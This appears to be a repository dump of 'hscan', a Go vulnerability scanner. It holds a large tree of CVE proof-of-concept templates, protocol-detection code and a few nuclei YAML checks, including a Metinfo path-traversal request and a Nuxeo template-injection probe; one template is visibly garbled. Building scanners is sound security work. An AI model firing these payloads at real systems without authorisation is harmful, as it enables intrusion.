wp-tinymce-lfi.yaml │ │ ├── wp-tutor-lfi.yaml │ │ ├── wp-under-construction-ssrf.yaml │ │ ├── wp-upload-data.yaml │ │ ├── wp-vault-lfi.yaml │ │ ├── wp-whmcs-xss.yaml │ │ ├── wp-woocommerce-email-verification.yaml │ │ ├── wp-woocommerce-file-download.yaml │ │ ├── wp-woocommerce-pdf-invoice-listing.yaml │ │ ├── wp-xmlrpc-pingback-detection.yaml │ │ ├── wp-xmlrpc.yaml │ │ ├── wpdm-cache-session.yaml │ │ ├── wpmudev-pub-keys.yaml │ │ └── wptouch-open-redirect.yaml └── xray2 │ ├── 74cms-sqli-1.yml │ ├── 74cms-sqli-2.yml │ ├── 74cms-sqli.yml │ ├── activemq-cve-2016-3088.yml │ ├── activemq-default-password.yml │ ├── airflow-unauth.yml │ ├── alibaba-canal-default-password.yml │ ├── alibaba-canal-info-leak.yml │ ├── alibaba-nacos-v1-auth-bypass.yml │ ├── amtt-hiboss-server-ping-rce.yml │ ├── apache-ambari-default-password.yml │ ├── apache-druid-cve-2021-36749.yml │ ├── apache-flink-upload-rce.yml │ ├── apache-httpd-cve-2021-40438-ssrf.yml │ ├── apache-httpd-cve-2021-41773-path-traversal.yml │ ├── apache-httpd-cve-2021-41773-rce.yml │ ├── apache-kylin-unauth-cve-2020-13937.yml │ ├── apache-nifi-api-unauthorized-access.yml │ ├── apache-ofbiz-cve-2018-8033-xxe.yml │ ├── apache-ofbiz-cve-2020-9496-xml-deserialization.yml │ ├── apache-storm-unauthorized-access.yml │ ├── aspcms-backend-leak.yml │ ├── bash-cve-2014-6271.yml │ ├── bt742-pma-unauthorized-access.yml │ ├── cacti-weathermap-file-write.yml │ ├── chinaunicom-modem-default-password.yml │ ├── cisco-cve-2020-3452-readfile.yml │ ├── citrix-cve-2019-19781-path-traversal.yml │ ├── citrix-cve-2020-8191-xss.yml │ ├── citrix-cve-2020-8193-unauthorized.yml │ ├── citrix-xenmobile-cve-2020-8209.yml │ ├── coldfusion-cve-2010-2861-lfi.yml │ ├── confluence-cve-2015-8399.yml │ ├── confluence-cve-2019-3396-lfi.yml │ ├── confluence-cve-2021-26084.yml │ ├── confluence-cve-2021-26085-arbitrary-file-read.yml │ ├── consul-rexec-rce.yml │ ├── consul-service-rce.yml │ ├── coremail-cnvd-2019-16798.yml │ ├── couchcms-cve-2018-7662.yml │ ├── couchdb-cve-2017-12635.yml │ ├── couchdb-unauth.yml │ ├── craftcms-seomatic-cve-2020-9757-rce.yml │ ├── dahua-cve-2021-33044-authentication-bypass.yml │ ├── datang-ac-default-password-cnvd-2021-04128.yml │ ├── dedecms-carbuyaction-fileinclude.yml │ ├── dedecms-cve-2018-6910.yml │ ├── dedecms-cve-2018-7700-rce.yml │ ├── dedecms-guestbook-sqli.yml │ ├── dedecms-membergroup-sqli.yml │ ├── dedecms-url-redirection.yml │ ├── discuz-ml3x-cnvd-2019-22239.yml │ ├── discuz-v72-sqli.yml │ ├── discuz-wechat-plugins-unauth.yml │ ├── discuz-wooyun-2010-080723.yml │ ├── dlink-850l-info-leak.yml │ ├── dlink-cve-2019-16920-rce.yml │ ├── dlink-cve-2019-17506.yml │ ├── dlink-cve-2020-25078-account-disclosure.yml │ ├── dlink-cve-2020-9376-dump-credentials.yml │ ├── dlink-dsl-2888a-rce.yml │ ├── docker-api-unauthorized-rce.yml │ ├── docker-registry-api-unauth.yml │ ├── dotnetcms-sqli.yml │ ├── draytek-cve-2020-8515.yml │ ├── druid-monitor-unauth.yml │ ├── drupal-cve-2014-3704-sqli.yml │ ├── drupal-cve-2018-7600-rce.yml │ ├── drupal-cve-2019-6340.yml │ ├── dubbo-admin-default-password.yml │ ├── duomicms-sqli.yml │ ├── dvr-cve-2018-9995.yml │ ├── e-zkeco-cnvd-2020-57264-read-file.yml │ ├── ecology-arbitrary-file-upload.yml │ ├── ecology-filedownload-directory-traversal.yml │ ├── ecology-javabeanshell-rce.yml │ ├── ecology-springframework-directory-traversal.yml │ ├── ecology-syncuserinfo-sqli.yml │ ├── ecology-v8-sqli.yml │ ├── ecology-validate-sqli.yml │ ├── ecology-workflowcentertreedata-sqli.yml │ ├── ecshop-cnvd-2020-58823-sqli.yml │ ├── ecshop-collection-list-sqli.yml │ ├── ecshop-rce.yml │ ├── eea-info-leak-cnvd-2021-10543.yml │ ├── elasticsearch-cve-2014-3120.yml │ ├── elasticsearch-cve-2015-1427.yml │ ├── elasticsearch-cve-2015-3337-lfi.yml │ ├── elasticsearch-cve-2015-5531.yml │ ├── elasticsearch-unauth.yml │ ├── etcd-unauth.yml │ ├── etouch-v2-sqli.yml │ ├── exchange-cve-2021-26855-ssrf.yml │ ├── exchange-cve-2021-41349-xss.yml │ ├── f5-cve-2021-22986.yml │ ├── f5-tmui-cve-2020-5902-rce.yml │ ├── fangweicms-sqli.yml │ ├── feifeicms-lfr.yml │ ├── finecms-sqli.yml │ ├── finereport-directory-traversal.yml │ ├── flexpaper-cve-2018-11686.yml │ ├── flink-jobmanager-cve-2020-17519-lfi.yml │ ├── fortigate-cve-2018-13379-readfile.yml │ ├── frp-dashboard-unauth.yml │ ├── gateone-cve-2020-35736.yml │ ├── gilacms-cve-2020-5515.yml │ ├── gitlab-graphql-info-leak-cve-2020-26413.yml │ ├── gitlab-ssrf-cve-2021-22214.yml │ ├── gitlist-rce-cve-2018-1000533.yml │ ├── glassfish-cve-2017-1000028-lfi.yml │ ├── go-pprof-leak.yml │ ├── gocd-cve-2021-43287.yml │ ├── grafana-default-password.yml │ ├── h2-database-web-console-unauthorized-access.yml │ ├── h3c-imc-rce.yml │ ├── h3c-secparh-any-user-login.yml │ ├── h5s-video-platform-cnvd-2020-67113-unauth.yml │ ├── hadoop-yarn-unauth.yml │ ├── hanming-video-conferencing-file-read.yml │ ├── harbor-cve-2019-16097.yml │ ├── hikvision-cve-2017-7921.yml │ ├── hikvision-info-leak.yml │ ├── hikvision-intercom-service-default-password.yml │ ├── hikvision-unauthenticated-rce-cve-2021-36260.yml │ ├── hjtcloud-arbitrary-fileread.yml │ ├── hjtcloud-directory-file-leak.yml │ ├── huawei-home-gateway-hg659-fileread.yml │ ├── ifw8-router-cve-2019-16313.yml │ ├── iis-put-getshell.yml │ ├── influxdb-unauth.yml │ ├── inspur-tscev4-cve-2020-21224-rce.yml │ ├── jboss-cve-2010-1871.yml │ ├── jboss-unauth.yml │ ├── jeewms-showordownbyurl-fileread.yml │ ├── jellyfin-cve-2021-29490.yml │ ├── jellyfin-file-read-cve-2021-21402.yml │ ├── jenkins-cve-2018-1000600.yml │ ├── jenkins-cve-2018-1000861-rce.yml │ ├── jenkins-unauthorized-access.yml │ ├── jetty-cve-2021-28164.yml │ ├── jinher-oa-c6-default-password.yml │ ├── jira-cve-2019-11581.yml │ ├── jira-cve-2019-8442.yml │ ├── jira-cve-2019-8449.yml │ ├── jira-cve-2020-14179.yml │ ├── jira-cve-2020-14181.yml │ ├── jira-ssrf-cve-2019-8451.yml │ ├── joomla-cnvd-2019-34135-rce.yml │ ├── joomla-component-vreview-sql.yml │ ├── joomla-cve-2015-7297-sqli.yml │ ├── joomla-cve-2017-8917-sqli.yml │ ├── joomla-cve-2018-7314-sql.yml │ ├── joomla-ext-zhbaidumap-cve-2018-6605-sqli.yml │ ├── jumpserver-unauth-rce.yml │ ├── jupyter-notebook-unauthorized-access.yml │ ├── kafka-manager-unauth.yml │ ├── kibana-cve-2018-17246.yml │ ├── kibana-unauth.yml │ ├── kingdee-eas-directory-traversal.yml │ ├── kingsoft-v8-default-password.yml │ ├── kingsoft-v8-file-read.yml │ ├── kong-cve-2020-11710-unauth.yml │ ├── kubernetes-unauth.yml │ ├── kyan-network-monitoring-account-password-leakage.yml │ ├── landray-oa-custom-jsp-fileread.yml │ ├── lanproxy-cve-2021-3019-lfi.yml │ ├── laravel-cve-2021-3129.yml │ ├── laravel-debug-info-leak.yml │ ├── laravel-improper-webdir.yml │ ├── maccms-rce.yml │ ├── maccmsv10-backdoor.yml │ ├── metinfo-cve-2019-16996-sqli.yml │ ├── metinfo-cve-2019-16997-sqli.yml │ ├── metinfo-cve-2019-17418-sqli.yml │ ├── metinfo-file-read.yml │ ├── metinfo-lfi-cnvd-2018-13393.yml │ ├── minio-default-password.yml │ ├── mongo-express-cve-2019-10758.yml │ ├── mpsec-isg1000-file-read.yml │ ├── msvod-sqli.yml │ ├── myucms-lfr.yml │ ├── nagio-cve-2018-10735.yml │ ├── nagio-cve-2018-10736.yml │ ├── nagio-cve-2018-10737.yml │ ├── nagio-cve-2018-10738.yml │ ├── natshell-arbitrary-file-read.yml │ ├── netentsec-icg-default-password.yml │ ├── netentsec-ngfw-rce.yml │ ├── netgear-cve-2017-5521.yml │ ├── nextjs-cve-2017-16877.yml │ ├── nexus-cve-2019-7238.yml │ ├── nexus-cve-2020-10199.yml │ ├── nexus-cve-2020-10204.yml │ ├── nexus-default-password.yml │ ├── nexusdb-cve-2020-24571-path-traversal.yml │ ├── nhttpd-cve-2019-16278.yml │ ├── node-red-dashboard-file-read-cve-2021-3223.yml │ ├── novnc-url-redirection-cve-2021-3654.yml │ ├── nps-default-password.yml │ ├── ns-asg-file-read.yml │ ├── nsfocus-uts-password-leak.yml │ ├── nuuo-file-inclusion.yml │ ├── odoo-file-read.yml │ ├── openfire-cve-2019-18394-ssrf.yml │ ├── opentsdb-cve-2020-35476-rce.yml │ ├── panabit-gateway-default-password.yml │ ├── panabit-ixcache-default-password.yml │ ├── pandorafms-cve-2019-20224-rce.yml │ ├── pbootcms-database-file-download.yml │ ├── pentaho-cve-2021-31602-authentication-bypass.yml │ ├── php-cgi-cve-2012-1823.yml │ ├── phpcms-cve-2018-19127.yml │ ├── phpmyadmin-cve-2018-12613-file-inclusion.yml │ ├── phpmyadmin-setup-deserialization.yml │ ├── phpok-sqli.yml │ ├── phpshe-sqli.yml │ ├── phpstudy-backdoor-rce.yml │ ├── phpstudy-nginx-wrong-resolve.yml │ ├── phpunit-cve-2017-9841-rce.yml │ ├── powercreator-arbitrary-file-upload.yml │ ├── prometheus-url-redirection-cve-2021-29622.yml │ ├── pulse-cve-2019-11510.yml │ ├── pyspider-unauthorized-access.yml │ ├── qibocms-sqli.yml │ ├── qilin-bastion-host-rce.yml │ ├── qizhi-fortressaircraft-unauthorized.yml │ ├── qnap-cve-2019-7192.yml │ ├── rabbitmq-default-password.yml │ ├── rails-cve-2018-3760-rce.yml │ ├── razor-cve-2018-8770.yml │ ├── rconfig-cve-2019-16663.yml │ ├── resin-cnnvd-200705-315.yml │ ├── resin-inputfile-fileread-or-ssrf.yml │ ├── resin-viewfile-fileread.yml │ ├── rockmongo-default-password.yml │ ├── ruijie-eg-cli-rce.yml │ ├── ruijie-eg-file-read.yml │ ├── ruijie-eg-info-leak.yml │ ├── ruijie-eweb-rce-cnvd-2021-09650.yml │ ├── ruijie-nbr1300g-cli-password-leak.yml │ ├── ruijie-uac-cnvd-2021-14536.yml │ ├── ruoyi-management-fileread.yml │ ├── saltstack-cve-2020-16846.yml │ ├── saltstack-cve-2021-25282-file-write.yml │ ├── samsung-wea453e-default-pwd.yml │ ├── samsung-wea453e-rce.yml │ ├── samsung-wlan-ap-wea453e-rce.yml │ ├── sangfor-ba-rce.yml │ ├── sangfor-edr-arbitrary-admin-login.yml │ ├── sangfor-edr-cssp-rce.yml │ ├── sangfor-edr-tool-rce.yml │ ├── satellian-cve-2020-7980-rce.yml │ ├── seacms-before-v992-rce.yml │ ├── seacms-rce.yml │ ├── seacms-sqli.yml │ ├── seacms-v654-rce.yml │ ├── seacmsv645-command-exec.yml │ ├── secnet-ac-default-password.yml │ ├── seeyon-a6-employee-info-leak.yml │ ├── seeyon-a6-test-jsp-sql.yml │ ├── seeyon-ajax-unauthorized-access.yml │ ├── seeyon-cnvd-2020-62422-readfile.yml │ ├── seeyon-oa-cookie-leak.yml │ ├── seeyon-session-leak.yml │ ├── seeyon-wooyun-2015-0108235-sqli.yml │ ├── seeyon-wooyun-2015-148227.yml │ ├── shiziyu-cms-apicontroller-sqli.yml │ ├── shopxo-cnvd-2021-15822.yml │ ├── showdoc-default-password.yml │ ├── showdoc-uploadfile.yml │ ├── skywalking-cve-2020-9483-sqli.yml │ ├── solarwinds-cve-2020-10148.yml │ ├── solr-cve-2017-12629-xxe.yml │ ├── solr-cve-2019-0193.yml │ ├── solr-fileread.yml │ ├── solr-velocity-template-rce.yml │ ├── sonarqube-cve-2020-27986-unauth.yml │ ├── sonicwall-ssl-vpn-rce.yml │ ├── spark-api-unauth.yml │ ├── spark-webui-unauth.yml │ ├── spon-ip-intercom-file-read.yml │ ├── spon-ip-intercom-ping-rce.yml │ ├── spring-cloud-cve-2020-5405.yml │ ├── spring-cloud-cve-2020-5410.yml │ ├── spring-cve-2016-4977.yml │ ├── springboot-env-unauth.yml │ ├── springcloud-cve-2019-3799.yml │ ├── supervisord-cve-2017-11610.yml │ ├── tamronos-iptv-rce.yml │ ├── telecom-gateway-default-password.yml │ ├── tensorboard-unauth.yml │ ├── terramaster-cve-2020-15568.yml │ ├── terramaster-tos-rce-cve-2020-28188.yml │ ├── thinkadmin-v6-readfile.yml │ ├── thinkcmf-lfi.yml │ ├── thinkcmf-write-shell.yml │ ├── thinkphp-v6-file-write.yml │ ├── thinkphp5-controller-rce.yml │ ├── thinkphp5023-method-rce.yml │ ├── tianqing-info-leak.yml │ ├── tomcat-cve-2017-12615-rce.yml │ ├── tomcat-cve-2018-11759.yml │ ├── tongda-meeting-unauthorized-access.yml │ ├── tongda-user-session-disclosure.yml │ ├── tpshop-directory-traversal.yml │ ├── tpshop-sqli.yml │ ├── tvt-nvms-1000-file-read-cve-2019-20085.yml │ ├── typecho-rce.yml │ ├── ueditor-cnvd-2017-20077-file-upload.yml │ ├── uwsgi-cve-2018-7490.yml │ ├── vbulletin-cve-2019-16759-bypass.yml │ ├── vbulletin-cve-2019-16759.yml │ ├── vmware-vcenter-arbitrary-file-read.yml │ ├── vmware-vcenter-unauthorized-rce-cve-2021-21972.yml │ ├── vmware-vrealize-cve-2021-21975-ssrf.yml │ ├── weaver-ebridge-file-read.yml │ ├── weblogic-cve-2017-10271.yml │ ├── weblogic-cve-2019-2725.yml │ ├── weblogic-cve-2019-2729-1.yml │ ├── weblogic-cve-2019-2729-2.yml │ ├── weblogic-cve-2020-14750.yml │ ├── weblogic-ssrf.yml │ ├── webmin-cve-2019-15107-rce.yml │ ├── weiphp-path-traversal.yml │ ├── weiphp-sql.yml │ ├── wifisky-default-password-cnvd-2021-39012.yml │ ├── wordpress-cve-2019-19985-infoleak.yml │ ├── wordpress-ext-adaptive-images-lfi.yml │ ├── wordpress-ext-mailpress-rce.yml │ ├── wuzhicms-v410-sqli.yml │ ├── xdcms-sql.yml │ ├── xiuno-bbs-cvnd-2019-01348-reinstallation.yml │ ├── xunchi-cnvd-2020-23735-file-read.yml │ ├── yapi-rce.yml │ ├── yccms-rce.yml │ ├── yongyou-u8-oa-sqli.yml │ ├── yonyou-grp-u8-sqli-to-rce.yml │ ├── yonyou-grp-u8-sqli.yml │ ├── yonyou-nc-arbitrary-file-upload.yml │ ├── yonyou-nc-bsh-servlet-bshservlet-rce.yml │ ├── youphptube-encoder-cve-2019-5127.yml │ ├── youphptube-encoder-cve-2019-5128.yml │ ├── youphptube-encoder-cve-2019-5129.yml │ ├── yungoucms-sqli.yml │ ├── zabbix-authentication-bypass.yml │ ├── zabbix-cve-2016-10134-sqli.yml │ ├── zabbix-default-password.yml │ ├── zcms-v3-sqli.yml │ ├── zeit-nodejs-cve-2020-5284-directory-traversal.yml │ ├── zeroshell-cve-2019-12725-rce.yml │ ├── zimbra-cve-2019-9670-xxe.yml │ └── zzcms-zsmanage-sqli.yml ├── utils ├── file.go ├── iconhash.go ├── log.go └── string.go └── webscan.go /.gitignore: -------------------------------------------------------------------------------- 1 | # Binaries for programs and plugins 2 | *.exe 3 | *.exe~ 4 | *.dll 5 | *.so 6 | *.dylib 7 | 8 | # Test binary, built with `go test -c` 9 | *.test 10 | 11 | # Output of the go coverage tool, specifically when used with LiteIDE 12 | *.out 13 | 14 | # Dependency directories (remove the comment below to include it) 15 | # vendor/ 16 | build/ 17 | .ide 18 | 19 | .DS_Store 20 | */.DS_Store 21 | 22 | #pocs/ 23 | url.txt 24 | 25 | output.txt 26 | 27 | hscan 28 | 29 | -------------------------------------------------------------------------------- /.idea/.gitignore: -------------------------------------------------------------------------------- 1 | # Default ignored files 2 | /shelf/ 3 | /workspace.xml 4 | # Editor-based HTTP Client requests 5 | /httpRequests/ 6 | # Datasource local storage ignored files 7 | /dataSources/ 8 | /dataSources.local.xml 9 | -------------------------------------------------------------------------------- /.idea/.name: -------------------------------------------------------------------------------- 1 | hscan -------------------------------------------------------------------------------- /.idea/hscan.iml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /.idea/modules.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /discover/parse/parse_ping.go: -------------------------------------------------------------------------------- 1 | package parse 2 | 3 | import ( 4 | "hscan/utils/logger" 5 | "os/exec" 6 | "runtime" 7 | "strconv" 8 | ) 9 | 10 | func Ping(host string, timeout int) bool { 11 | var to = strconv.Itoa(timeout) 12 | var cmd *exec.Cmd 13 | switch runtime.GOOS { 14 | case "windows": 15 | cmd = exec.Command("ping", host, "-n", "1", "-w", to) 16 | case "linux": 17 | cmd = exec.Command("ping", host, "-c", "1", "-w", to, "-W", to) 18 | case "darwin": 19 | cmd = exec.Command("ping", host, "-c", "1", "-W", to) 20 | } 21 | if cmd == nil { 22 | return false 23 | } 24 | err := cmd.Run() 25 | if logger.DebugError(err) { 26 | return false 27 | } 28 | return true 29 | } 30 | -------------------------------------------------------------------------------- /discover/parse/parse_verbose.go: -------------------------------------------------------------------------------- 1 | package parse 2 | 3 | import ( 4 | "encoding/hex" 5 | "fmt" 6 | "hscan/utils/logger" 7 | ) 8 | 9 | func VerboseParse(res map[string]interface{}) { 10 | logger.Verbose(fmt.Sprintf("Hex dump\n%s", hex.Dump(res["banner.byte"].([]byte)))) 11 | r := "\n" 12 | for k, v := range res { 13 | r += fmt.Sprintf("%18s: %s", fmt.Sprintf(k), fmt.Sprintln(v)) 14 | } 15 | logger.Verbose(fmt.Sprintf("Dismap identify result\n%s", r)) 16 | } 17 | -------------------------------------------------------------------------------- /discover/protocol/get/udp.go: -------------------------------------------------------------------------------- 1 | package get 2 | 3 | func UdpProtocol(host string, port int, timeout int) ([]byte, error) { 4 | return make([]byte, 256), nil 5 | } 6 | -------------------------------------------------------------------------------- /discover/protocol/judge/tcp_ftp.go: -------------------------------------------------------------------------------- 1 | package judge 2 | 3 | import ( 4 | "hscan/utils/logger" 5 | "regexp" 6 | ) 7 | 8 | func TcpFTP(result map[string]interface{}) bool { 9 | var buff []byte 10 | buff, _ = result["banner.byte"].([]byte) 11 | ok, err := regexp.Match(`(^220(.*FTP|.*FileZilla)|^421(.*)connections)`, buff) 12 | if logger.DebugError(err) { 13 | return false 14 | } 15 | if ok { 16 | result["protocol"] = "ftp" 17 | return true 18 | } 19 | return false 20 | } 21 | -------------------------------------------------------------------------------- /discover/protocol/judge/tcp_imap.go: -------------------------------------------------------------------------------- 1 | package judge 2 | 3 | import ( 4 | "hscan/utils/logger" 5 | "regexp" 6 | ) 7 | 8 | func TcpIMAP(result map[string]interface{}) bool { 9 | var buff []byte 10 | buff, _ = result["banner.byte"].([]byte) 11 | ok, err := regexp.Match(`^* OK`, buff) 12 | if logger.DebugError(err) { 13 | return false 14 | } 15 | if ok { 16 | result["protocol"] = "imap" 17 | return true 18 | } 19 | return false 20 | } 21 | -------------------------------------------------------------------------------- /discover/protocol/judge/tcp_mysql.go: -------------------------------------------------------------------------------- 1 | package judge 2 | 3 | import ( 4 | "hscan/utils/logger" 5 | "regexp" 6 | ) 7 | 8 | func TcpMysql(result map[string]interface{}) bool { 9 | var buff []byte 10 | buff, _ = result["banner.byte"].([]byte) 11 | ok, err := regexp.Match(`(mysql_native_password|MySQL server|MariaDB server|mysqladmin flush-hosts)`, buff) 12 | if logger.DebugError(err) { 13 | return false 14 | } 15 | if ok { 16 | result["protocol"] = "mysql" 17 | return true 18 | } 19 | return false 20 | } 21 | -------------------------------------------------------------------------------- /discover/protocol/judge/tcp_pop3.go: -------------------------------------------------------------------------------- 1 | package judge 2 | 3 | import ( 4 | "hscan/utils/logger" 5 | "regexp" 6 | ) 7 | 8 | func TcpPOP3(result map[string]interface{}) bool { 9 | var buff []byte 10 | buff, _ = result["banner.byte"].([]byte) 11 | ok, err := regexp.Match(`^\+OK`, buff) 12 | if logger.DebugError(err) { 13 | return false 14 | } 15 | if ok { 16 | result["protocol"] = "pop3" 17 | return true 18 | } 19 | return false 20 | } 21 | -------------------------------------------------------------------------------- /discover/protocol/judge/tcp_redis.go: -------------------------------------------------------------------------------- 1 | package judge 2 | 3 | import ( 4 | "hscan/utils/logger" 5 | "regexp" 6 | ) 7 | 8 | func TcpRedis(result map[string]interface{}) bool { 9 | var buff []byte 10 | buff, _ = result["banner.byte"].([]byte) 11 | ok, err := regexp.Match(`(^-ERR(.*)command|^-DENIED.Redis)`, buff) 12 | if logger.DebugError(err) { 13 | return false 14 | } 15 | if ok { 16 | result["protocol"] = "redis" 17 | return true 18 | } 19 | return false 20 | } 21 | -------------------------------------------------------------------------------- /discover/protocol/judge/tcp_smtp.go: -------------------------------------------------------------------------------- 1 | package judge 2 | 3 | import ( 4 | "hscan/utils/logger" 5 | "regexp" 6 | ) 7 | 8 | func TcpSMTP(result map[string]interface{}) bool { 9 | var buff []byte 10 | buff, _ = result["banner.byte"].([]byte) 11 | ok, err := regexp.Match(`(^220[ -](.*)ESMTP|^421(.*)Service not available|^554 )`, buff) 12 | if logger.DebugError(err) { 13 | return false 14 | } 15 | if ok { 16 | result["protocol"] = "smtp" 17 | return true 18 | } 19 | return false 20 | } 21 | -------------------------------------------------------------------------------- /discover/protocol/judge/tcp_snmp.go: -------------------------------------------------------------------------------- 1 | package judge 2 | 3 | import ( 4 | "bytes" 5 | ) 6 | 7 | func TcpSNMP(result map[string]interface{}) bool { 8 | b := result["banner.byte"].([]byte) 9 | if bytes.Equal(b[:], make([]byte, 0)[:]) { 10 | return false 11 | } 12 | 13 | buff := []byte{0x41, 0x01, 0x02} 14 | snmp := result["banner.byte"].([]byte)[0:3] 15 | if bytes.Equal(buff[:], snmp[:]) { 16 | result["protocol"] = "snmp" 17 | return true 18 | } 19 | return false 20 | } -------------------------------------------------------------------------------- /discover/protocol/judge/tcp_ssh.go: -------------------------------------------------------------------------------- 1 | package judge 2 | 3 | import ( 4 | "hscan/utils/logger" 5 | "regexp" 6 | "strings" 7 | ) 8 | 9 | func TcpSSH(result map[string]interface{}) bool { 10 | var buff []byte 11 | buff, _ = result["banner.byte"].([]byte) 12 | ok, err := regexp.Match(`^SSH.\d`, buff) 13 | if logger.DebugError(err) { 14 | return false 15 | } 16 | if ok { 17 | str := result["banner.string"].(string) 18 | result["banner.string"] = strings.Split(str, "\\x0d\\x0a")[0] 19 | result["protocol"] = "ssh" 20 | return true 21 | } 22 | return false 23 | } 24 | -------------------------------------------------------------------------------- /discover/protocol/judge/tcp_telnet.go: -------------------------------------------------------------------------------- 1 | package judge 2 | 3 | import ( 4 | "hscan/utils/logger" 5 | "regexp" 6 | ) 7 | 8 | func TcpTelnet(result map[string]interface{}) bool { 9 | var buff []byte 10 | buff, _ = result["banner.byte"].([]byte) 11 | ok, err := regexp.Match(`(Telnet>|^BeanShell)`, buff) 12 | if logger.DebugError(err) { 13 | return false 14 | } 15 | if ok { 16 | result["protocol"] = "telnet" 17 | return true 18 | } 19 | return false 20 | } 21 | -------------------------------------------------------------------------------- /discover/protocol/judge/tcp_vnc.go: -------------------------------------------------------------------------------- 1 | package judge 2 | 3 | import ( 4 | "hscan/utils/logger" 5 | "regexp" 6 | ) 7 | 8 | func TcpVNC(result map[string]interface{}) bool { 9 | var buff []byte 10 | buff, _ = result["banner.byte"].([]byte) 11 | ok, err := regexp.Match(`^RFB \d`, buff) 12 | if logger.DebugError(err) { 13 | return false 14 | } 15 | if ok { 16 | result["protocol"] = "vnc" 17 | return true 18 | } 19 | return false 20 | } 21 | -------------------------------------------------------------------------------- /discover/protocol/judge/tls_rdp.go: -------------------------------------------------------------------------------- 1 | package judge 2 | 3 | func TlsRDP(result map[string]interface{}, Args map[string]interface{}) bool { 4 | if TcpRDP(result, Args) { 5 | return true 6 | } 7 | return false 8 | } -------------------------------------------------------------------------------- /discover/protocol/judge/tls_redis_ssl.go: -------------------------------------------------------------------------------- 1 | package judge 2 | 3 | import ( 4 | "hscan/utils/logger" 5 | "regexp" 6 | ) 7 | 8 | func TlsRedisSsl(result map[string]interface{}) bool { 9 | var buff []byte 10 | buff, _ = result["banner.byte"].([]byte) 11 | ok, err := regexp.Match(`(^-ERR(.*)command|^-(.*).Redis)`, buff) 12 | if logger.DebugError(err) { 13 | return false 14 | } 15 | if ok { 16 | result["protocol"] = "redis-ssl" 17 | return true 18 | } 19 | return false 20 | } 21 | -------------------------------------------------------------------------------- /docs/pages1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/perlh/hscan/f9da286fa0acbb123ee4876fe27a2981ecc425e3/docs/pages1.png -------------------------------------------------------------------------------- /hscan_template.toml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/perlh/hscan/f9da286fa0acbb123ee4876fe27a2981ecc425e3/hscan_template.toml -------------------------------------------------------------------------------- /nonweb/utils/info_struct.go: -------------------------------------------------------------------------------- 1 | package utils 2 | 3 | type HostInfo struct { 4 | Host string 5 | Port string 6 | Domain string 7 | Url string 8 | Path string 9 | Timeout int64 10 | Command string 11 | } 12 | -------------------------------------------------------------------------------- /utils/logger/level.go: -------------------------------------------------------------------------------- 1 | package logger 2 | 3 | type Level int 4 | 5 | const ( 6 | LevelFatal Level = iota 7 | LevelError 8 | LevelInfo 9 | LevelWarning 10 | LevelDebug 11 | LevelVerbose 12 | ) 13 | -------------------------------------------------------------------------------- /web/pkg/nuclei/structs/poc.go: -------------------------------------------------------------------------------- 1 | package structs 2 | 3 | import "github.com/projectdiscovery/nuclei/v2/pkg/templates" 4 | 5 | type Poc = templates.Template 6 | -------------------------------------------------------------------------------- /web/pkg/nuclei/structs/task.go: -------------------------------------------------------------------------------- 1 | package structs 2 | 3 | type Task struct { 4 | Poc Poc 5 | Target string 6 | } 7 | -------------------------------------------------------------------------------- /web/pkg/xray/structs/cache.go: -------------------------------------------------------------------------------- 1 | package structs 2 | 3 | import "net/http" 4 | 5 | type HttpRequestCache struct { 6 | Request *http.Request 7 | ProtoRequest *Request 8 | ProtoResponse *Response 9 | } 10 | 11 | type TCPUDPRequestCache struct { 12 | Response []byte 13 | ProtoResponse *Response 14 | } 15 | -------------------------------------------------------------------------------- /web/pkg/xray/structs/tasks.go: -------------------------------------------------------------------------------- 1 | package structs 2 | 3 | type Task struct { 4 | Poc Poc 5 | Target string 6 | } 7 | -------------------------------------------------------------------------------- /web/pocs/nuclei/cnvd/2018/CNVD-2018-13393.yaml: -------------------------------------------------------------------------------- 1 | id: CNVD-2018-13393 2 | 3 | info: 4 | name: Metinfo LFI 5 | author: ritikchaddha 6 | severity: high 7 | reference: 8 | - https://paper.seebug.org/676/ 9 | tags: metinfo,cnvd,cvnd2018,lfi 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}/include/thumb.php?dir=http\..\admin\login\login_check.php' 15 | 16 | redirects: true 17 | max-redirects: 2 18 | matchers-condition: and 19 | matchers: 20 | - type: word 21 | part: body 22 | words: 23 | - "(.*?)" 21 | - "(.*?)" 22 | condition: and 23 | 24 | - type: status 25 | status: 26 | - 200 27 | -------------------------------------------------------------------------------- /web/pocs/nuclei/cves/2018/CVE-2018-16341.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-16341 2 | 3 | info: 4 | name: Nuxeo Authentication Bypass Remote Code Execution 5 | author: madrobot 6 | severity: high 7 | description: Nuxeo Authentication Bypass Remote Code Execution < 10.3 using a SSTI 8 | classification: 9 | cve-id: CVE-2018-16341 10 | tags: cve,cve2018,nuxeo,ssti,rce,bypass 11 | 12 | requests: 13 | - method: GET 14 | path: 15 | - "{{BaseURL}}/nuxeo/login.jsp/pwn${31333333330+7}.xhtml" 16 | matchers: 17 | - type: word 18 | words: 19 | - "31333333337" 20 | part: body 21 | -------------------------------------------------------------------------------- /web/pocs/nuclei/miscellaneous/addeventlistener-detect.yaml: -------------------------------------------------------------------------------- 1 | id: addeventlistener-detect 2 | 3 | info: 4 | name: DOM EventListener detection 5 | author: yavolo,dwisiswant0 6 | severity: info 7 | reference: 8 | - https://portswigger.net/web-security/dom-based/controlling-the-web-message-source 9 | tags: xss,misc 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: regex 18 | part: body 19 | regex: 20 | - (([\w\_]+)\.)?add[Ee]vent[Ll]istener\(["']?[\w\_]+["']? # Test cases: https://www.regextester.com/?fam=121118 21 | -------------------------------------------------------------------------------- /web/pocs/nuclei/miscellaneous/clientaccesspolicy.yaml: -------------------------------------------------------------------------------- 1 | id: clientaccesspolicy 2 | 3 | info: 4 | name: Silverlight cross-domain policy 5 | author: emadshanab 6 | severity: info 7 | tags: misc 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/clientaccesspolicy.xml" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - "" 19 | - "" 20 | - "domain uri=" 21 | condition: and 